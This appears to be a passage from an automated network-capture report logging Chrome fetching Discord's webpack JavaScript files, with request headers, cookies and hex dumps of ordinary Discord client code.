                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Z.MTrWXYna45fXtGvhRBk.Y5ys9ax0.AcL1Lr.Qg04Y-1702226714835-0-604800000
                                                                          2023-12-10 16:45:15 UTC973INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 39 37 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 63 66 62 65 39 37 34 39 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 11972Connection: closeCF-Ray: 8336f50cfbe97491-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC396INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 36 32 33 30 22 5d 2c 7b 33 30 39 35 37 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 2e 74 79 70 65 21 3d 3d 6c 2e 41 63 74 69 76 69 74 79 54 79 70 65 73 2e 43 55 53 54 4f 4d 5f 53 54 41 54 55 53 26 26 28 6e 75 6c 6c 21
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26230"],{309570:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return u}});var l=n("49111");function u(t){return null!=t&&t.type!==l.ActivityTypes.CUSTOM_STATUS&&(null!
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 63 6f 6c 6c 65 63 74 47 75 69 6c 64 41 6e 61 6c 79 74 69 63 73 4d 65 74 61 64 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 63 6f 6c 6c 65 63 74 43 68 61 6e 6e 65 6c 41 6e 61 6c 79 74 69 63 73 4d 65 74 61 64 61 74 61 46 72 6f 6d 49 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 7d 2c 63 6f 6c 6c 65 63 74 43 68 61 6e 6e 65 6c 41 6e 61 6c 79 74 69 63 73 4d 65 74 61 64 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 7d 2c 63 6f 6c 6c 65 63 74 56 6f 69 63 65 41 6e 61 6c 79 74 69 63 73 4d 65 74 61 64 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d
                                                                          Data Ascii: function(t,e,n){"use strict";n.r(e),n.d(e,{collectGuildAnalyticsMetadata:function(){return C},collectChannelAnalyticsMetadataFromId:function(){return O},collectChannelAnalyticsMetadata:function(){return L},collectVoiceAnalyticsMetadata:function(){return M
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 2c 67 75 69 6c 64 5f 69 73 5f 76 69 70 3a 6e 2e 68 61 73 46 65 61 74 75 72 65 28 79 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 56 49 50 5f 52 45 47 49 4f 4e 53 29 2c 69 73 5f 6d 65 6d 62 65 72 3a 6e 75 6c 6c 21 3d 75 2c 6e 75 6d 5f 76 6f 69 63 65 5f 63 68 61 6e 6e 65 6c 73 5f 61 63 74 69 76 65 3a 4e 28 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 74 29 7b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 65 3d 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 6e 75 6c 6c 3a 4c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 74 29 7b 76 61 72 20 65 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6e 3d 21 31 2c 6c 3d 74 2e 67
                                                                          Data Ascii: ,guild_is_vip:n.hasFeature(y.GuildFeatures.VIP_REGIONS),is_member:null!=u,num_voice_channels_active:N(_)}}function O(t){if(null==t)return null;let e=r.default.getChannel(t);return null==e?null:L(e)}function L(t){var e;if(null==t)return null;let n=!1,l=t.g
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 47 75 69 6c 64 49 64 28 29 3a 6e 75 6c 6c 2c 6f 3d 22 63 68 61 6e 6e 65 6c 5f 69 64 22 69 6e 20 61 3f 61 2e 63 68 61 6e 6e 65 6c 5f 69 64 3a 64 3f 76 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 49 64 28 63 29 3a 6e 75 6c 6c 2c 66 3d 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 6f 29 3b 6c 65 74 20 5f 3d 28 65 3d 66 2c 6e 3d 63 2c 6e 75 6c 6c 3d 3d 65 3f 6e 75 6c 6c 21 3d 6e 3f 6e 3a 6e 75 6c 6c 3a 65 2e 69 73 50 72 69 76 61 74 65 28 29 3f 6e 75 6c 6c 3a 6e 75 6c 6c 21 3d 3d 28 75 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 65 2e 67 65 74 47 75 69 6c 64 49 64 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 6e 29 26 26 76 6f 69 64 20 30 21 3d 3d 75 3f 75 3a 6e 75 6c 6c 29 3b 6c 65 74 20 67 3d 7b 2e 2e 2e 61 2c 2e 2e 2e 43 28 5f 29
                                                                          Data Ascii: GuildId():null,o="channel_id"in a?a.channel_id:d?v.default.getChannelId(c):null,f=r.default.getChannel(o);let _=(e=f,n=c,null==e?null!=n?n:null:e.isPrivate()?null:null!==(u=null!==(l=e.getGuildId())&&void 0!==l?l:n)&&void 0!==u?u:null);let g={...a,...C(_)
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 20 63 3d 6f 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 72 65 74 75 72 6e 7b 72 65 63 65 6e 74 43 75 73 74 6f 6d 53 74 61 74 75 73 65 73 3a 5b 5d 2c 63 75 72 72 65 6e 74 44 65 66 61 75 6c 74 53 74 61 74 75 73 3a 6e 75 6c 6c 7d 7d 63 6c 61 73 73 20 66 20 65 78 74 65 6e 64 73 20 73 2e 64 65 66 61 75 6c 74 2e 50 65 72 73 69 73 74 65 64 53 74 6f 72 65 7b 69 6e 69 74 69 61 6c 69 7a 65 28 74 29 7b 63 3d 7b 2e 2e 2e 6f 28 29 2c 2e 2e 2e 6e 75 6c 6c 21 3d 74 3f 74 3a 7b 7d 7d 7d 67 65 74 53 74 61 74 65 28 29 7b 72 65 74 75 72 6e 20 63 7d 67 65 74 43 75 72 72 65 6e 74 48 61 6e 67 53 74 61 74 75 73 28 29 7b 72 65 74 75 72 6e 20 6c 7d 67 65 74 43 75 73 74 6f 6d 48 61 6e 67 53 74 61 74 75 73 28 29 7b 72 65 74 75 72 6e 20 75 7d 67 65 74 52 65 63 65 6e 74 43 75 73
                                                                          Data Ascii: c=o();function o(){return{recentCustomStatuses:[],currentDefaultStatus:null}}class f extends s.default.PersistedStore{initialize(t){c={...o(),...null!=t?t:{}}}getState(){return c}getCurrentHangStatus(){return l}getCustomHangStatus(){return u}getRecentCus
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 29 2c 6e 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6c 3d 6e 28 22 37 31 34 36 31 37 22 29 2c 75 3d 6e 2e 6e 28 6c 29 2c 69 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 61 3d 6e 2e 6e 28 69 29 2c 73 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 72 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 64 3d 6e 28 22 33 30 39 35 37 30 22 29 2c 63 3d 6e 28 22 33 32 33 34 36 22 29 2c 6f 3d 6e 28 22 32 37 31 39 33 38 22 29 2c 66 3d 6e 28 22 36 39 37 32 31 38 22 29 2c 5f 3d 6e 28 22 34 39 31 31 31 22 29 3b 6c 65 74 20 67 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 5b 5d 29 2c 53 3d 7b 7d 2c 45 3d 7b 7d 2c 76 3d 7b 7d 2c 70 3d 7b 7d 2c 54 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 49 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 53 5b 74 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 6e 3f 6e 5b 65 5d
                                                                          Data Ascii: ),n("424973");var l=n("714617"),u=n.n(l),i=n("917351"),a=n.n(i),s=n("446674"),r=n("913144"),d=n("309570"),c=n("32346"),o=n("271938"),f=n("697218"),_=n("49111");let g=Object.freeze([]),S={},E={},v={},p={},T={};function I(t,e){let n=S[t];return null!=n?n[e]
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 53 74 61 74 75 73 3a 69 2c 61 63 74 69 76 69 74 69 65 73 3a 67 2c 74 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 65 6c 73 65 7b 6c 65 74 20 74 3d 61 2e 6c 65 6e 67 74 68 3e 31 3f 5b 2e 2e 2e 61 5d 2e 73 6f 72 74 28 79 29 3a 61 2c 6e 3d 73 5b 65 5d 3b 61 3d 6e 75 6c 6c 21 3d 6e 26 26 75 28 6e 2e 61 63 74 69 76 69 74 69 65 73 2c 74 29 3f 6e 2e 61 63 74 69 76 69 74 69 65 73 3a 74 2c 73 5b 65 5d 3d 7b 73 74 61 74 75 73 3a 6c 2c 63 6c 69 65 6e 74 53 74 61 74 75 73 3a 69 2c 61 63 74 69 76 69 74 69 65 73 3a 61 2c 74 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 7d 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 54 5b 6e 5d 2c 6d 28 6e 29 2c 21 30 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 74 29 7b 6c 65 74 7b 67 75 69 6c 64 49 64 3a 65 2c 75
                                                                          Data Ascii: Status:i,activities:g,timestamp:Date.now()};else{let t=a.length>1?[...a].sort(y):a,n=s[e];a=null!=n&&u(n.activities,t)?n.activities:t,s[e]={status:l,clientStatus:i,activities:a,timestamp:Date.now()}}return delete T[n],m(n),!0}function O(t){let{guildId:e,u
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 3d 28 6e 3d 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 73 74 61 74 75 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 75 7d 67 65 74 41 63 74 69 76 69 74 69 65 73 28 74 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 3d 3d 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 6e 3d 76 5b 74 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 67 7d 6c 65 74 20 6c 3d 49 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6c 7c 7c 6e 75 6c 6c 3d 3d 6c 2e 61 63 74 69 76 69 74 69 65 73 3f 67 3a 6c 2e 61 63 74 69 76 69 74 69 65 73 7d 67 65 74 50 72 69 6d
                                                                          Data Ascii: =(n=null==a?void 0:a.status)&&void 0!==n?n:u}getActivities(t){let e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(null==e){var n;return null!==(n=v[t])&&void 0!==n?n:g}let l=I(t,e);return null==l||null==l.activities?g:l.activities}getPrim
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6f 72 45 61 63 68 28 74 3d 3e 7b 74 2e 70 72 65 73 65 6e 63 65 73 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 7b 75 73 65 72 3a 6e 2c 73 74 61 74 75 73 3a 6c 2c 63 6c 69 65 6e 74 53 74 61 74 75 73 3a 61 2c 61 63 74 69 76 69 74 69 65 73 3a 73 7d 3d 65 3b 4f 28 7b 67 75 69 6c 64 49 64 3a 74 2e 69 64 2c 75 73 65 72 49 64 3a 6e 2e 69 64 2c 73 74 61 74 75 73 3a 6c 2c 63 6c 69 65 6e 74 53 74 61 74 75 73 3a 61 2c 61 63 74 69 76 69 74 69 65 73 3a 73 2c 74 69 6d 65 73 74 61 6d 70 3a 69 7d 29 2c 75 2e 61 64 64 28 6e 2e 69 64 29 7d 29 7d 29 2c 6e 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 6c 65 74 7b 75 73 65 72 3a 65 2c 73 74 61 74 75 73 3a 6e 2c 63 6c 69 65 6e 74 53 74 61 74 75 73 3a 6c 2c 61 63 74 69 76 69 74 69 65 73 3a 61 7d 3d 74 3b 6e 75 6c 6c 21 3d 65 26 26
                                                                          Data Ascii: orEach(t=>{t.presences.forEach(e=>{let{user:n,status:l,clientStatus:a,activities:s}=e;O({guildId:t.id,userId:n.id,status:l,clientStatus:a,activities:s,timestamp:i}),u.add(n.id)})}),n.forEach(t=>{let{user:e,status:n,clientStatus:l,activities:a}=t;null!=e&&


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          289192.168.2.550024162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/17744.a586cfff7253ad1f7ffe.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=A_tEuyVy8iqHdI02DBjD2_Kf.MIluBkk8K9XlyGqVu8-1702226715211-0-604800000
                                                                          2023-12-10 16:45:15 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 36 37 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 64 39 66 32 62 64 62 32 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 29678Connection: closeCF-Ray: 8336f50d9f2bdb21-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 37 37 34 34 22 5d 2c 7b 36 31 38 30 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 63 61 6e 45 64 69 74 43 6c 79 64 65 41 49 50 72 6f 66 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 22 39 35 37 32 35 35 22 29 2c 69 3d 72 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 6c 2e 64 65 66 61 75 6c 74 2e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["17744"],{618017:function(e,t,r){"use strict";r.r(t),r.d(t,{canEditClydeAIProfile:function(){return o}});var l=r("957255"),i=r("49111");function o(e){return null!=e&&l.default.
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 63 61 6e 28 69 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 55 53 45 5f 43 4c 59 44 45 5f 41 49 2c 65 29 7d 7d 2c 31 39 30 30 34 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 22 33 37 39 38 33 22 29 3b 72 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 69 3d 72 28 22 37 37 30 37 38 22 29 2c 6f 3d 72 28 22 35 39 39 31 31 30 22 29 2c 6e 3d 72 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 6e 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 4f 50 45 4e 5f 4d 4f 44 41 4c 2c 7b 74 79 70 65 3a 22
                                                                          Data Ascii: can(i.Permissions.USE_CLYDE_AI,e)}},190045:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return s}});var l=r("37983");r("884691");var i=r("77078"),o=r("599110"),n=r("49111");function s(e){o.default.track(n.AnalyticEvents.OPEN_MODAL,{type:"
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 43 54 5f 44 45 54 41 49 4c 53 5f 4f 50 45 4e 22 2c 69 74 65 6d 3a 65 7d 29 7d 2c 70 3d 61 73 79 6e 63 28 29 3d 3e 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 41 54 45 47 4f 52 49 45 53 5f 46 45 54 43 48 22 7d 29 3b 74 72 79 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 64 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 41 54 45 47 4f 52 49 45 53 29 3b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 41 54 45 47 4f 52 49 45 53 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 22 2c 63 61 74 65 67 6f 72 69 65 73 3a 65 2e 62 6f 64 79 2e 6d 61 70 28 73 2e 64
                                                                          Data Ascii: CT_DETAILS_OPEN",item:e})},p=async()=>{i.default.dispatch({type:"COLLECTIBLES_CATEGORIES_FETCH"});try{let e=await l.default.get(d.Endpoints.COLLECTIBLES_CATEGORIES);i.default.dispatch({type:"COLLECTIBLES_CATEGORIES_FETCH_SUCCESS",categories:e.body.map(s.d
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6f 6d 53 65 72 76 65 72 29 7d 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 4c 41 49 4d 5f 46 41 49 4c 55 52 45 22 2c 73 6b 75 49 64 3a 65 2c 65 72 72 6f 72 3a 74 7d 29 2c 6e 65 77 20 6e 2e 41 50 49 45 72 72 6f 72 28 74 29 7d 7d 2c 43 3d 61 73 79 6e 63 28 65 2c 74 29 3d 3e 7b 74 72 79 7b 6c 65 74 20 72 3d 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 64 2e 45 6e 64 70 6f 69 6e 74 73 2e 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 56 41 4c 49 44 5f 47 49 46 54 5f 52 45 43 49 50 49 45 4e 54 2c 71 75 65 72 79 3a 7b 73 6b 75 5f 69 64 3a 74 2c 72 65 63 69 70 69 65 6e 74 5f 69 64 3a 65 7d 7d 29 3b 72 65 74 75 72 6e
                                                                          Data Ascii: omServer)})}catch(t){throw i.default.dispatch({type:"COLLECTIBLES_CLAIM_FAILURE",skuId:e,error:t}),new n.APIError(t)}},C=async(e,t)=>{try{let r=await l.default.get({url:d.Endpoints.COLLECTIBLES_VALID_GIFT_RECIPIENT,query:{sku_id:t,recipient_id:e}});return
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 73 70 6c 61 79 4e 61 6d 65 3d 22 43 6f 6c 6c 65 63 74 69 62 6c 65 73 50 65 72 73 69 73 74 65 64 53 74 6f 72 65 22 2c 66 2e 70 65 72 73 69 73 74 4b 65 79 3d 22 43 6f 6c 6c 65 63 74 69 62 6c 65 73 50 65 72 73 69 73 74 65 64 53 74 6f 72 65 56 32 22 3b 76 61 72 20 45 3d 6e 65 77 20 66 28 6e 2e 64 65 66 61 75 6c 74 2c 7b 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 41 54 45 47 4f 52 59 5f 49 54 45 4d 53 5f 56 49 45 57 45 44 3a 65 3d 3e 7b 6c 65 74 7b 63 61 74 65 67 6f 72 69 65 73 3a 74 2c 69 74 65 6d 54 79 70 65 73 3a 72 7d 3d 65 2c 6c 3d 6e 65 77 20 44 61 74 65 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 7b 73 6b 75 49 64 3a 69 7d 3d 74 2c 6f 3d 72 2e 72 65 64 75 63 65 28 28 65 2c 74 29 3d 3e 7b 76 61 72 20 72 3b 72 65 74
                                                                          Data Ascii: splayName="CollectiblesPersistedStore",f.persistKey="CollectiblesPersistedStoreV2";var E=new f(n.default,{COLLECTIBLES_CATEGORY_ITEMS_VIEWED:e=>{let{categories:t,itemTypes:r}=e,l=new Date;return t.reduce((e,t)=>{let{skuId:i}=t,o=r.reduce((e,t)=>{var r;ret
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 70 28 65 3d 3e 5b 65 2e 73 6b 75 49 64 2c 65 5d 29 29 29 2c 6c 3d 76 6f 69 64 20 30 2c 6f 3d 76 6f 69 64 20 30 7d 2c 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 43 4c 41 49 4d 5f 46 41 49 4c 55 52 45 3a 65 3d 3e 7b 6c 65 74 7b 65 72 72 6f 72 3a 74 2c 73 6b 75 49 64 3a 72 7d 3d 65 3b 6c 3d 72 2c 6f 3d 74 7d 2c 4c 4f 47 4f 55 54 3a 65 3d 3e 7b 64 3d 75 2c 63 3d 21 31 2c 6c 3d 76 6f 69 64 20 30 2c 69 3d 76 6f 69 64 20 30 2c 6f 3d 76 6f 69 64 20 30 7d 7d 29 7d 2c 38 30 35 31 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74
                                                                          Data Ascii: p(e=>[e.skuId,e]))),l=void 0,o=void 0},COLLECTIBLES_CLAIM_FAILURE:e=>{let{error:t,skuId:r}=e;l=r,o=t},LOGOUT:e=>{d=u,c=!1,l=void 0,i=void 0,o=void 0}})},805172:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return o}});var l=r("862205");let
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 6c 6c 2c 6c 3d 65 2e 69 6e 69 74 69 61 6c 50 72 6f 64 75 63 74 53 6b 75 49 64 7d 2c 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 53 48 4f 50 5f 43 4c 4f 53 45 3a 75 2c 43 4f 4c 4c 45 43 54 49 42 4c 45 53 5f 50 52 4f 44 55 43 54 5f 44 45 54 41 49 4c 53 5f 4f 50 45 4e 3a 65 3d 3e 7b 65 2e 69 74 65 6d 2e 73 6b 75 49 64 3d 3d 3d 6c 26 26 28 6c 3d 76 6f 69 64 20 30 29 7d 2c 4c 4f 47 4f 55 54 3a 75 7d 29 7d 2c 35 31 34 32 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 2c 72 28 22 38 30 38 36 35 33 22 29 2c 72 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6c 2c 69 3d 72 28 22 34 30 37 37 38
